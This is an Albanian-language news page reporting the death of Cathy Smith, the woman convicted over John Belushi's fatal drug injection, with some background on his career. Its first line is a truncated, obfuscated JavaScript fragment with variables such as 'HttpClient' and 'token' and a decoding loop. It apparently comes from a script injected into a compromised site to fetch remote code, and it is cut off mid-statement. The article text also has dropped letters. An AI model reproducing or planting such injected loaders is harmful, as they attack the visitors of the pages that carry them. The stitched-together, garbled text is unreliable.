;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vdes gruaja që vrau Xhon Belushin

By

Cathy Evelyn Smith, ish- e fejuara e aktorit të madh me origjinë shqiptare, Xhon Belushi, ka ndërruar jetë në moshën 73-vjeçare, pas një sëmundje. Ajo ka ndërruar jetë në 18 gusht në banesën e saj në Kanada, por lajmi është bërë publik vetëm sot.

Ai ishte vetëm 33 vjeç, kur e fejuara e vet, një këngëtare dhe kërcëimtare, i injektoi gabimisht një “bombë”, përzierje mes kokainës dhe heroinës, çka i shkaktoi vdekjen aktorit më të madh të asaj kohe në SHBA, Xhon Belushit.

Cathy Smith, Singer Linked To John Belushi's Death, Dies At 73 | Crime News

“The National Enquirer” hapej në ato kohë me një titull të fortë: “Ka vrarë Xhon Belushin”, pasi llimisht u mendua se ai kishte vdekur aksidentalisht, duke konsumuar drogë, pasi Belushi njihej si përdorues droge. Por më pas u provua që atij i kishte injektuar një përziere të rrezikshme e fejuara e vet, gjë që më pas u provua edhe nga kjo e fundit. Smith u dënua me 15 muaj burg, për vrasje të shkallës së dytë. Xhon Belushi ishte aktor, komedian, por edhe këngëtar.

Edhe pse karriera e tij zgjati pak, ai konsiderohet si një ndër artistët më të mëdhenj dhe sipas kritikëve të artit, nëse jeta e tij do të vazhdonte, do të ishte kthyer ndoshta në aktorin më të madh të të gjitha kohërave. Roli i tij në lmin “The Blues Brothers”, e ka bërë atë të pavdekshëm. (TEMA)

Artikuj të ngjashëm